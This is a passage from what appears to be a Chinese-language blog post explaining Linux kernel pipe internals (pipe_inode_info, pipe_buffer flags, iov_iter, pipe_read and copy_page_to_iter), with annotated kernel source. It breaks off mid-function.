class="comment"> *  @fasync_writers: writer side fasync</span></span><br><span class="line"><span class="comment"> *  @bufs: the circular array of pipe buffers</span></span><br><span class="line"><span class="comment"> *  @user: the user who created this pipe</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mutex</span> mutex;</span><br><span class="line">    <span class="type">wait_queue_head_t</span> rd_wait, wr_wait;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> head;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> tail;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> max_usage;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> ring_size;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> readers;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> writers;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> files;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> r_counter;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> w_counter;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">page</span> *tmp_page;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fasync_struct</span> *fasync_readers;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fasync_struct</span> *fasync_writers;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *bufs;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">user_struct</span> *user;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>这个结构体麻雀虽小五脏俱全，该有的都有，包括等待写入/读取该管道的队列、管道大小、存放具体内存的指针数组等等。</p><p>pipe 存放数据使用的是<strong>环形队列</strong>，即在定长大小的数据环（pipe buf ring）上，尽可能的存储数据；因此这里需要简单强调一下一些字段的用途：</p><ul><li><p><code>head</code>：标注队列首部的索引，注意这里的索引单位是一个 <code>pipe_buffer</code>。<strong>head 为接下来要写入的位置</strong>。</p></li><li><p><code>tail</code>：标注队列尾部的索引，<strong>tail 为接下来要读取的位置</strong>。</p><p>上面两个字段的关系有点类似这样：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">low addr                                 high addr</span><br><span class="line">+--------------------------------------------+</span><br><span class="line">|  |  |  |  |  |  |  | &gt;|//|//|//|&gt; |  |  |  |</span><br><span class="line">+--------------------------------------------+</span><br><span class="line">                       A   ----&gt;   A</span><br><span class="line">                       |           |</span><br><span class="line">                     tail         head</span><br></pre></td></tr></table></figure><p>无论是 head 还是 tail，它们<strong>都指向没写满的 <code>pipe_buffer</code></strong>（有点类似 STL 的 end 方法）。</p></li><li><p><code>max_usage</code>：最大可用的 pipe_buffer 个数，这个字段约束了整个 pipe 所能容纳的数据大小。</p></li><li><p><code>ring_size</code>：当前已分配的 pipe_buffer 个数，<strong>注意该值必须为2的幂。</strong></p></li><li><p><code>files</code>：结构体 file 引用至该管道的个数。这个有点类似某个管道被 dup 出多个 fd 一样。</p></li><li><p><code>tmp_page</code>：缓存先前被释放的 page，这个 page 可以被重用以降低重分配开销。</p></li><li><p><code>bufs</code>：实际存放多个 pipe_buffer 的数组，在设计上我们需要将该一维数组看作一个环。</p></li></ul><h4 id="b-pipe-buffer">b. pipe_buffer</h4><p>接下来我们简单深入一下结构体 <code>pipe_buffer</code>，该结构体存放着实际管道中存放的数据：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  struct pipe_buffer - a linux kernel pipe buffer</span></span><br><span class="line"><span class="comment"> *  @page: the page containing the data for the pipe buffer</span></span><br><span class="line"><span class="comment"> *  @offset: offset of data inside the @page</span></span><br><span class="line"><span class="comment"> *  @len: length of data inside the @page</span></span><br><span class="line"><span class="comment"> *  @ops: operations associated with this buffer. See @pipe_buf_operations.</span></span><br><span class="line"><span class="comment"> *  @flags: pipe buffer flags. See above.</span></span><br><span class="line"><span class="comment"> *  @private: private data owned by the ops.</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">page</span> *page;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> offset, len;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">pipe_buf_operations</span> *ops;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> flags;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> <span class="keyword">private</span>;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>这个结构体存放了包括页引用、页偏移、数据大小等关键信息。这里的 flag 共有这几种：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include/linux/pipe_fs_i.h</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_LRU       0x01    <span class="comment">/* page is on the LRU */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_ATOMIC    0x02    <span class="comment">/* was atomically mapped */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_GIFT      0x04    <span class="comment">/* page is a gift */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_PACKET    0x08    <span class="comment">/* read() as a packet */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> PIPE_BUF_FLAG_CAN_MERGE 0x10    <span class="comment">/* can merge buffers */</span></span></span><br></pre></td></tr></table></figure><p>我们可以暂时不用去管这几种 flag 具体的意思。</p><h4 id="c-iov-iter">c. iov_iter</h4><p>结构体 iov_iter 用于<strong>迭代</strong>那种<strong>被分为多个页的数据</strong>，换句话说，该结构体将用于迭代一个个页面。其结构体如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">enum</span> <span class="title class_">iter_type</span> &#123;</span><br><span class="line">    <span class="comment">/* iter types */</span></span><br><span class="line">    ITER_IOVEC = <span class="number">4</span>,</span><br><span class="line">    ITER_KVEC = <span class="number">8</span>,</span><br><span class="line">    ITER_BVEC = <span class="number">16</span>,</span><br><span class="line">    ITER_PIPE = <span class="number">32</span>,    <span class="comment">// 表示正在迭代的数据是位于 pipe 中的</span></span><br><span class="line">    ITER_DISCARD = <span class="number">64</span>,</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">iov_iter</span> &#123;</span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">     * Bit 0 is the read/write bit, set if we&#x27;re writing.</span></span><br><span class="line"><span class="comment">     * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and</span></span><br><span class="line"><span class="comment">     * the caller isn&#x27;t expecting to drop a page reference when done.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> type;</span><br><span class="line">    <span class="type">size_t</span> iov_offset;</span><br><span class="line">    <span class="type">size_t</span> count;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">iovec</span> *iov;</span><br><span class="line">        <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">kvec</span> *kvec;</span><br><span class="line">        <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">bio_vec</span> *bvec;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe;</span><br><span class="line">    &#125;;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="type">unsigned</span> <span class="type">long</span> nr_segs;</span><br><span class="line">        <span class="keyword">struct</span> &#123;</span><br><span class="line">            <span class="type">unsigned</span> <span class="type">int</span> head;</span><br><span class="line">            <span class="type">unsigned</span> <span class="type">int</span> start_head;</span><br><span class="line">        &#125;;</span><br><span class="line">    &#125;;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>其中，一些字段的意义如下：</p><ul><li><p><code>type</code>：表示当前迭代的数据是来自于什么结构，例如：</p><ul><li>ITER_PIPE 表示当前迭代的数据为某个 pipe 中的页数据</li><li>ITER_DISCARD 表示写入当前 iov_iter 的数据全部丢弃。</li></ul><p>后续针对 iov_iter 做内存读写时，会根据这个 type 来执行不同类型的内存读写操作。</p></li><li><p><code>iov_offset</code>：当前所迭代到 page 的相对偏移，读写将从该 page 的这个相对偏移开始。</p></li><li><p><code>cout</code>：可读写的数组字节大小</p></li></ul><h3 id="2-pipe-read-函数">2. pipe_read 函数</h3><p>pipe_read 函数位于 <code>fs/pipe.c</code> 中，当内核需要<strong>从某个管道中读取数据</strong>时便会调用该函数：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">file_operations</span> pipefifo_fops = &#123;</span><br><span class="line">    .open             = fifo_open,</span><br><span class="line">    .llseek           = no_llseek,</span><br><span class="line">    .read_iter        = pipe_read,     <span class="comment">// read</span></span><br><span class="line">    .write_iter       = pipe_write,    <span class="comment">// write</span></span><br><span class="line">    .poll             = pipe_poll,</span><br><span class="line">    .unlocked_ioctl   = pipe_ioctl,</span><br><span class="line">    .release          = pipe_release,</span><br><span class="line">    .fasync           = pipe_fasync,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>首先，该函数声明如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">ssize_t</span></span></span><br><span class="line"><span class="function"><span class="title">pipe_read</span><span class="params">(<span class="keyword">struct</span> kiocb *iocb, <span class="keyword">struct</span> iov_iter *to)</span></span></span><br></pre></td></tr></table></figure><p>这些结构体我们可以不用记住，只需简单知道：</p><ul><li><code>iocb</code>：中存放着获取当前 pipe 结构体的指针</li><li><code>to</code>：从管道读出来的数据将要写入的地方，iov_iter 迭代器类型。</li></ul><p>接下来，内核从 <code>to</code> 中获取待读取的大小，并从 <code>iocb</code> 中获取 <code>pipe_inode_info</code> 结构体；如果待读取大小为 0 则直接返回：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">size_t</span> total_len = <span class="built_in">iov_iter_count</span>(to);</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">file</span> *filp = iocb-&gt;ki_filp;</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pipe_inode_info</span> *pipe = filp-&gt;private_data;</span><br><span class="line"><span class="type">bool</span> was_full, wake_next_reader = <span class="literal">false</span>;</span><br><span class="line"><span class="type">ssize_t</span> ret;</span><br><span class="line"></span><br><span class="line"><span class="comment">/* Null read succeeds. */</span></span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">unlikely</span>(total_len == <span class="number">0</span>))</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">ret = <span class="number">0</span>;</span><br><span class="line">__pipe_lock(pipe);</span><br></pre></td></tr></table></figure><p>接下来，kernel 尝试判断 pipe 是否已满，如果满了则设置 <code>was_full</code> 标志：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">was_full = pipe_full(pipe-&gt;head, pipe-&gt;tail, pipe-&gt;max_usage);</span><br></pre></td></tr></table></figure><p>虽然这个标志对我们理解主要逻辑没有太大的影响，但这里提起它是为了看看 pipe 是如何判断是否已满的：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * pipe_occupancy - Return number of slots used in the pipe</span></span><br><span class="line"><span class="comment"> * @head: The pipe ring head pointer</span></span><br><span class="line"><span class="comment"> * @tail: The pipe ring tail pointer</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">unsigned</span> <span class="type">int</span> <span class="title">pipe_occupancy</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> head, <span class="type">unsigned</span> <span class="type">int</span> tail)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> head - tail;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * pipe_full - Return true if the pipe is full</span></span><br><span class="line"><span class="comment"> * @head: The pipe ring head pointer</span></span><br><span class="line"><span class="comment"> * @tail: The pipe ring tail pointer</span></span><br><span class="line"><span class="comment"> * @limit: The maximum amount of slots available.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">bool</span> <span class="title">pipe_full</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> head, <span class="type">unsigned</span> <span class="type">int</span> tail,</span></span></span><br><span class="line"><span class="params"><span class="function">                 <span class="type">unsigned</span> <span class="type">int</span> limit)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">pipe_occupancy</span>(head, tail) &gt;= limit;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看到，如果 <code>pipe-&gt;head - pipe-&gt;tail &gt;= pipe-&gt;max_usage</code>，则说明 pipe 数据区已满。相对的，判断 pipe 是否为空也很简单：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * pipe_empty - Return true if the pipe is empty</span></span><br><span class="line"><span class="comment"> * @head: The pipe ring head pointer</span></span><br><span class="line"><span class="comment"> * @tail: The pipe ring tail pointer</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">bool</span> <span class="title">pipe_empty</span><span class="params">(<span class="type">unsigned</span> <span class="type">int</span> head, <span class="type">unsigned</span> <span class="type">int</span> tail)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">return</span> head == tail;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>回到 <code>pipe_read</code> 函数，接下来 kernel 将循环读取 pipe：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (;;) &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> head = pipe-&gt;head;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> tail = pipe-&gt;tail;</span><br><span class="line">    <span class="comment">// 注意 pipe-&gt;ring_size 为 2的幂，因此 ring_size-1 转成二进制为 0b1111...111</span></span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span> mask = pipe-&gt;ring_size - <span class="number">1</span>;</span><br><span class="line">    <span class="comment">// 如果管道中存在数据</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">pipe_empty</span>(head, tail)) &#123;</span><br><span class="line">        <span class="comment">// 获取 head 所对应的 pipe_buffer，注意 head 的范围可以大于 max_usage，因为整个 pipe_buffer 的设计就是把它当作一个环</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">pipe_buffer</span> *buf = &amp;pipe-&gt;bufs[tail &amp; mask];</span><br><span class="line">        <span class="comment">// 获取当前读取的 buf 数据大小</span></span><br><span class="line">        <span class="type">size_t</span> chars = buf-&gt;len;</span><br><span class="line">        <span class="type">size_t</span> written;</span><br><span class="line">        <span class="type">int</span> error;</span><br><span class="line">    </span><br><span class="line">        <span class="comment">// 如果当前可读取的 buf 大小大于 需要读入的大小，则截断</span></span><br><span class="line">        <span class="keyword">if</span> (chars &gt; total_len)</span><br><span class="line">            chars = total_len;</span><br><span class="line">        <span class="comment">// 调用 pipe_buf 的 confirm 方法，确保 pipe buffer 中的数据有效</span></span><br><span class="line">        error = <span class="built_in">pipe_buf_confirm</span>(pipe, buf);</span><br><span class="line">        <span class="keyword">if</span> (error) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!ret)</span><br><span class="line">                ret = error;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    </span><br><span class="line">        <span class="comment">// 将当前 pipe buffer 所对应的内存页，写入 to 中</span></span><br><span class="line">        written = <span class="built_in">copy_page_to_iter</span>(buf-&gt;page, buf-&gt;offset, chars, to);</span><br><span class="line">        <span class="comment">// 如果写入大小 &lt; 可写大小，则说明在写入数据时出现不可恢复的错误，直接返回</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">unlikely</span>(written &lt; chars)) &#123;</span><br><span class="line">            <span class="keyword">if</span> (!ret)</span><br><span class="line">                ret = -EFAULT;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 一轮读取完成，如果带读取大小仍然不为0，则准备继续循环读取</span></span><br><span class="line">        ret += chars;</span><br><span class="line">        buf-&gt;offset += chars;</span><br><span class="line">        buf-&gt;len -= chars;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* Was it a packet buffer? Clean up and exit */</span></span><br><span class="line">        <span class="comment">// 若引用该 pipe 的 fd 设置了 O_DIRECT 标志，这个标志可以在 pipe_write 函数中看看是怎么使用的</span></span><br><span class="line">        <span class="keyword">if</span> (buf-&gt;flags &amp; PIPE_BUF_FLAG_PACKET) &#123;</span><br><span class="line">            total_len = chars;</span><br><span class="line">            buf-&gt;len = <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 如果当前 pipe buffer 已经全部读取完成，则更新 tail 至下一个 pipe buffer</span></span><br><span class="line">        <span class="keyword">if</span> (!buf-&gt;len) &#123;</span><br><span class="line">            <span class="built_in">pipe_buf_release</span>(pipe, buf);</span><br><span class="line">            <span class="built_in">spin_lock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line">            tail++;</span><br><span class="line">            pipe-&gt;tail = tail;</span><br><span class="line">            <span class="built_in">spin_unlock_irq</span>(&amp;pipe-&gt;rd_wait.lock);</span><br><span class="line">        &#125;</span><br><span class="line">        total_len -= chars;</span><br><span class="line">        <span class="comment">// 如果正常读取完，则直接返回</span></span><br><span class="line">        <span class="keyword">if</span> (!total_len)</span><br><span class="line">            <span class="keyword">break</span>;    <span class="comment">/* common path: read succeeded */</span></span><br><span class="line">        <span class="comment">// 如果还需要读取数据，并且管道里确实还有数据，则循环读取</span></span><br><span class="line">        <span class="keyword">if</span> (!<span class="built_in">pipe_empty</span>(head, tail))    <span class="comment">/* More to do? */</span></span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!pipe-&gt;writers)</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> (ret)</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">if</span> (filp-&gt;f_flags &amp; O_NONBLOCK) &#123;</span><br><span class="line">        ret = -EAGAIN;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    __pipe_unlock(pipe);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">         * We only get here if we didn&#x27;t actually read anything.</span></span><br><span class="line"><span class="comment">         * ...</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">    ...;</span><br><span class="line">&#125;</span><br><span class="line">...;</span><br><span class="line"></span><br><span class="line"><span class="keyword">return</span> ret;</span><br></pre></td></tr></table></figure><h3 id="3-copy-page-to-iter-相关">3. copy_page_to_iter 相关</h3><p>从函数 pipe_buffer 的注释中可以得知大致的读取 pipe 的流程。其中 <code>copy_page_to_iter</code> 函数会根据变量 <code>to</code> 的内部字段 <code>type</code> 来选择执行不同的操作：</p><blockquote><p>不过总体上的功能，还是将传入的 page 复制进 iov_iter 所指向的位置。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// include/linux/uio.h</span></span><br><span class="line"><span class="function"><span class="type">static</span> __always_inline __must_check</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">copy_to_iter</span><span class="params">(<span class="type">const</span> <span class="type">void</span> *addr, <span class="type">size_t</span> bytes, <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!<span class="built_in">check_copy_size</span>(addr, bytes, <span class="literal">true</span>)))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> _copy_to_iter(addr, bytes, i);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// lib/iov_iter.c</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">copy_page_to_iter</span><span class="params">(<span class="keyword">struct</span> page *page, <span class="type">size_t</span> offset, <span class="type">size_t</span> bytes,</span></span></span><br><span class="line"><span class="params"><span class="function">             <span class="keyword">struct</span> iov_iter *i)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 判断数据读写是否越界，通常这个 check 肯定是可以通过的</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">unlikely</span>(!<span class="built_in">page_copy_sane</span>(page, offset, bytes)))</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (i-&gt;type &amp; (ITER_BVEC|ITER_KVEC)) &#123;</span><br><span class="line">        <span class="type">void</span> *kaddr = <span class="built_in">kmap_atomic</span>(page);</span><br><span class="line">        <span class="type">size_t</span> wanted = <span class="built_in">copy_to_iter</span>(kaddr + offset, bytes, i);</span><br><span class="line">        <span class="built_in">kunmap_atomic</span>(kaddr);</span><br><span class="line">        <span class="keyword">return</span> wanted;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">unlikely</span>(<span class="built_in">iov_iter_is_discard</span>(i)))</span><br><span class="line">        <span class="keyword">return</span> bytes;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">likely</span>(!<span class="built_in">iov_iter_is_pipe</span>(i))) </span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">copy_page_to_iter_iovec</span>(page, offset, bytes, i);</span><br><span class="line">    <span class="keyword">else</span> <span class="comment">// (i-&gt;type &amp; ~(READ | WRITE)) == ITER_PIPE</span></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">copy_page_to_iter_pipe</span>(page, offset, bytes, i);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里我们只关注当 <code>to</code> 也为一个 pipe 时，数据是如何复制的，即 <code>copy_page_to_iter_pipe</code> 函数。整个函数其实很短：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">size_t</span> <span class="title">copy_page_to_iter_pipe</span><span class="params">(<span class="keyword">struct</span> page *page, <span 